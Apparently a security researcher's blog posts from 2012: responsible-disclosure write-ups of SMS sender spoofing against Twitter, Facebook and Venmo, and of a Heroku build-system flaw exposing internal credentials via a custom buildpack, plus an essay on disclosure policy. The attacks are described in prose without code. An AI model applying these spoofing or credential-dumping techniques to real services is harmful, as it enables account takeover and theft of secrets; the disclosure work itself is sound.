December 3, 2012
Update: Twitter has fixed the issue for users of short codes. Users that use
a “long code” should enable the PIN code in their account.
Twitter users with SMS enabled are vulnerable to an attack that allows anyone to
post to their account. The attacker only needs knowledge of the mobile number
associated with a target’s Twitter account. Messages can then be sent to Twitter
with the source number spoofed.
Like email, the originating address of a SMS cannot be trusted. Many SMS
gateways allow the originating address of a message to be set to an arbitrary
identifier, including someone else’s number.
Facebook and Venmo were also vulnerable to the same spoofing attack, but
the issues were resolved after disclosing to their respective security teams.
Users of Twitter that have a mobile number associated with their account and
have not set a PIN code are vulnerable. All of the Twitter SMS
commands can be
used by an attacker, including the ability to post tweets and modify profile
All services that trust the originating address of SMS messages implicitly and
are not using a short code are vulnerable.
Until Twitter removes the ability to post via non-short code numbers, users
should enable PIN codes (if available in their region) or disable the mobile
text messaging feature.
Twitter has a PIN code feature that requires every message to be prepended
with a four-digit alphanumeric code. This feature mitigates the issue, but is
not available to users inside the United States.
The cleanest solution for providers is to use only an SMS short code to receive
incoming messages. In most cases, messages to short codes do not leave the
carrier network and can only be sent by subscribers. This removes the ease of
spoofing via SMS gateways.
An alternative, less user-friendly but more secure solution is to require
a challenge-response for every message. After receiving an SMS, the service
would reply with a short alphanumeric string that needs to be repeated back
before the message is processed.
The issue I filed was initially inspected by a member of their security team,
but was then routed to the normal support team who did not believe that SMS
spoofing was possible. I then reached out directly to someone on the security
team who said that it was an “old issue” but that they did not want me to
publish until they got “a fix in place”. I received no further communication
|17 Aug 2012
||I notified Twitter about the vulnerability via their web form.
|20 Aug 2012
||Twitter Security routed my report to their mobile support team.
|6 Sep 2012
||Twitter asked me not to publish until they have fixed the issue.
|15 Oct 2012
||I requested an update on the issue, and receive no response.
|28 Nov 2012
||I notified Twitter that I would publicly disclose this issue.
|4 Dec 2012
||I received confirmation that the issue has been resolved.
Initially Facebook did not respond to my report on their security vulnerability
page. I then emailed a friend who works at Facebook, who facilitated my contact
with their security team.
|19 Aug 2012
||I notified Facebook about the vulnerability via their web form.
|6 Sep 2012
||I received a response after getting a friend on the engineering team to bump the issue internally.
|28 Nov 2012
||I received confirmation that the issue had been resolved.
Disclosure: I will receive a bounty from Facebook for finding and reporting
this issue to them. The Facebook bounty
program requires responsible
disclosure and time to resolve internally in “good faith” before publishing.
I initially disclosed this issue to Venmo support, as they do not have
a security contact published. When I did no receive a response, I notified the
Braintree security team (Braintree recently
who responded very promptly.
July 6, 2012
|29 Nov 2012
||I notified Venmo support about the vulnerability.
|30 Nov 2012
||I notified Braintree security and received a response within 40 minutes.
|1 Dec 2012
||I received confirmation that Venmo SMS payments have been disabled, mitigating the vulnerability.
Every company with public-facing web applications needs a clear security
disclosure policy. This policy serves three main purposes. First it tells people
who discover a vulnerability how to proceed and what your response will be so
they can report problems easily. Secondly it tells your employees exactly how to
process and respond to these reports. Most importantly, a clear public security
policy lets your users know in advance how you will respond to recently
As I discovered last week when notifying Heroku of a vulnerability in their
build system, even the most
progressive, respected companies don’t always get it 100% right.
No matter how well designed your application, users will find bugs. When (not
if) that happens, it is vital that the person who discovers the vulnerability
knows how to report it.
Bug reporting is a funnel, just like every other part of your web application.
If users get confused or decide you are not worth their time, they will leave
the site without converting. In this case your “users” may be curious hackers,
security researchers, or even your own customers. It’s your job to make
reporting as easy, painless, and rewarding as possible. If you fail, you risk
not finding out about the vulnerability, which could endanger your users’ data
and the company’s future. Remember, the person reporting a security flaw is
being friendly and doing you a big favor. Treat them accordingly.
At some point, someone will need to report a security vulnerability. You don’t
want to have that conversation you in public or in the clear. It is also not
a problem you want to outsource to Twitter, Facebook, or a forum. The first
thing on your security page should be a link to firstname.lastname@example.org.
The second is a PGP public key, which can be used to send you encrypted
messages. This page should always be served over HTTPS. Only by encrypting
each step in the communication process can the sender be sure the person they
are emailing is who they claim to be without being intercepted. If the PGP key
is not posted already, a responsible hacker might email a request for one to be
posted which wastes valuable time. The person discovering the vulnerability
might become unavailable by the time the key is posted, causing further delays.
The policies listed on this page should be clear, concise, and friendly. The
person who discovers a vulnerability is already in a difficult position and it
is important they understand your policies.
A person who accidentally discovers a vulnerability may need to experiment
further to see how far the problem goes, and even if it is in fact
a vulnerability. Often it is not possible to determine the nature of
a vulnerability without trying to do something that should not normally be
possible or allowed. Unfortunately parts of this process often necessarily run
afoul of the law in some jurisdictions, meaning that if the hacker wants to
report a problem to a company, s/he needs to admit to participating in
a possibly illegal activity. Some companies make this difficult situation worse
by threatening legal action outright or if the disclosing hackers refuse to
sign a retroactive NDA. Minor penetration is a routine part of security testing
and user exploration. Regardless of the legal threats available to your company,
using them against users, hackers, or researchers who acted without malicious
intent is never advisable.
For these reasons it is vital that you indemnify and hold blameless anyone who
penetrates your site, and in the process of exploring or experimenting, extracts
a small amount of sensitive data and promptly notifies you then destroys any
data collected. Without a clear and binding promise of immunity from future
prosecution, those who discover vulnerabilities may not notify you at all.
Publishing a clear policy that protects the party disclosing an exploit is the
first, and most important step in building trust.
Details about a vulnerability are worth a great deal of money. This kind of
information is valuable not only to your competitors, but also on growing black
and grey markets. Many other parties would pay for the details of
a vulnerability in order to exploit it themselves. This means that anyone
discovering a vulnerability on your site could sell it easily. Knowledge of
a vulnerability will always be worth more to your company than any of these
others. However, a hacker asking for money either before or after making
a disclosure can make everyone uncomfortable. Avoid this situation entirely by
advertising generous bounties ahead of time. Here’s what some companies are
The free market determines how much a vulnerability in your system is worth. For
products with large user bases, the prices can get very
The best companies also make their pre-release code or a staging server with
dummy data available for testing with even higher rewards. In this case exploits
can be found and remedied before users’ data is ever compromised.
Without the threat of full disclosure, responsible disclosure would not work,
and vendors would go back to ignoring security vulnerabilities.
Do not ever try to get hackers or researchers to take a bounty in exchange for
not publishing their discovery (and it is their discovery). Unfortunately some
companies offer bounties only in exchange for silence. Don’t attach strings to
bounties. Many hackers prize recognition higher than remuneration, and there’s
no need to deprive them of both. Similarly, security researchers make their
living off of their reputation for discovering holes. A great policy is to
offer a reasonable no-strings-attached bounty and then double for responsible
is when the researcher who discovered a vulnerability notifies the creator of
the product and allows them a reasonable amount of time to fix it. After that
time, the researcher publishes the details publicly regardless of whether the
users have been officially notified.
No matter what, remember that someone disclosing a vulnerability to you directly
is usually trying to do the right thing.
Respond very quickly. When the crisis ends, the discussion will be about how
your company handled the situation. It is crucial that the relevant team began
work immediately instead of waiting until the next day, or for a lawyer’s
permission to talk to the person who reported the problem. Any delay will look
like either incompetence or a conspiracy to cover up the vulnerability. You
can’t afford for customers or the press to think either. Your customers will be
busy checking their own data and then decide if they should change providers.
The timing of your response should not be its own reason to leave.
Emails to email@example.com are your company’s highest priority,
period. Your lawyer, investors, and mother can all wait. Messages to that
address should be forwarded to the highest ranking member of your
security/ops/engineering team on call and the CEO. If you don’t have a 24-hour
on-call rotation, create a script with Twilio, Tropo, or Adhearsion that wakes
up the CEO or founders. Whoever needs to respond to the problem gets woken up
and/or called back from vacation. You asked your customers trust you with their
data (and often their own customers’ as well). Many of those affected would
gladly wake up themselves to fix it if they were able. You have an obligation to
respond as quickly as you are physically able.
Hearing about a vulnerability is a high stress time for your team. Try not to
make it worse. They already feel like they screwed up no matter what caused the
vulnerability. Don’t have a blame culture–make it clear you’re all on the same
team and share a single mission: doing the best you can for your customers.
Your security team needs to be in direct contact immediately with the person who
discovered the vulnerability. Any attempts at legal maneuvering will slow down
their response and distract the only people who can fix the problem(s). Make it
clear that your team’s responsibility is to patch the application, not manage
your company’s strategic communications. If developers are free to treat each
other as peers without a lawyer leaning over their shoulders, the patch will
Customers need to know about a problem after it has been patched. Public
disclosure means you get caught with your pants down. Discovery without
disclosure means someone has a backdoor to your users’ lives and businesses.
Which do you think they would prefer? Your obligation to your customers comes
first, regardless of any embarrassment it might cause. If world governments are
not able to keep their embarrassing secrets, it is unlikely you will be able to
either (for long). Honest and direct communication builds user loyalty, hiding
the failures that affect your users causes far bigger problems.
- All vulnerabilities caught in pre-release stage.
- Vulnerabilities in production code caught and responsibly disclosed.
- Vulnerabilities caught and disclosed to users and company simultaneously.
- Vulnerabilities discovered by malicious party and exploited without company or user knowledge.
Always remember when you are dealing with disclosure of a security issue that
things could be much worse–you could not know about it.
July 3, 2012
Update: Heroku’s official response.
Last week I discovered a major security flaw in the
system. This vulnerability
exposed sensitive information including API keys, private keys and server
Once I realized the extent of the vulnerability, I immediately informed Heroku.
I have been in regular contact with their security team and the problem has
since been fixed.
Understanding the issue requires operational knowledge of the Cedar stack build
Cedar Build Process
Since Heroku runs on
receiving a git push of an application, the build request is dispatched to
a regular Heroku app named Codon that handles builds. Codon runs
a buildpack which compiles
the application so that it can be deployed.
Normally apps running on Heroku are entirely isolated using Linux
Containers, but to perform builds Codon runs
untrusted code in this container.
Source Code Exposure
I encountered a Ruby exception and backtrace from the Heroku build system while
experimenting with custom
backtraces look like this:
app.rb:2:in `foo': undefined method `a' for nil:NilClass (NoMethodError)
from app.rb:5:in `<main>'
Backtraces include the paths to the source files that encountered the exception.
This pointed me to the source files for Codon, which indicated the possibility
of gaining read access to the code.
I then ran a custom buildpack that copied the source code into my Heroku app and
verified that it was possible to view the source code of Codon.
While examining the source code I discovered that there was another
vulnerability that was much more serious than source code exposure.
Sensitive Credential Exposure
Like most Heroku apps, Codon uses environment
variables to configure
runtime options including sensitive credentials. This ensures that credentials
are not checked into version control. However, due to the constraints of Heroku
containers, Codon is running as the same user as the buildpack, which is
untrusted. This allows the buildpack to dump the environment variables of Codon
from the Linux process table:
The environment variables exposed included critical credentials such as internal
API keys, a SSH private key with access to source code repositories, Redis
connection details, and a key with access to their
Immediately after discovering this vulnerability, I sent an email to Heroku’s
security team to start the disclosure process. I requested a PGP key first, as
they did not provide one on their website. Here is the discovery and disclosure
|2012-06-26 19:45 PDT
||Encountered backtrace and began experimenting.
|2012-06-26 20:25 PDT
||Sent email to Heroku asking for PGP key.
|2012-06-26 22:40 PDT
||Received PGP key from Heroku.
|2012-06-26 22:56 PDT
||Received follow-up email with mobile phone number of a Heroku security engineer.
|2012-06-26 22:58 PDT
||Sent PGP encrypted description of the vulnerability.
|2012-06-26 23:06 PDT
||Received confirmation of receipt.
|2012-06-27 12:01 PDT
||Received confirmation that an interim patch would be pushed in a few hours, and full patch by Tuesday (2012-07-03).
|2012-06-28 20:44 PDT
||Checked validity of credentials, SSH and Campfire keys were still valid.
|2012-06-29 16:13 PDT
||Checked validity of credentials, all credentials were invalid.
|2012-07-03 13:35 PDT
||Received confirmation that the issue had been patched.
The build system appears to have been vulnerable since the Cedar stack
a year ago. Customer applications and credentials could have been compromised at
some point due to the credential exposed by the vulnerability. Anyone who ran
applications on Heroku during this period should immediately reset all sensitive
credentials, and audit their access logs to determine if any infrastructure or
data has been accessed.
I suspect that a variant of this vulnerability may exist in other Platform as
a Service build systems. Further research is warranted.
Full Disclosure: I remain a Heroku customer with several apps in
production, and I have no plans to change platforms. Heroku offered me a paid
penetration test contract, but required that I sign a retroactive non-disclosure
agreement which would have precluded publishing this article.
If you liked this, then you should check out my article on security
disclosure policy best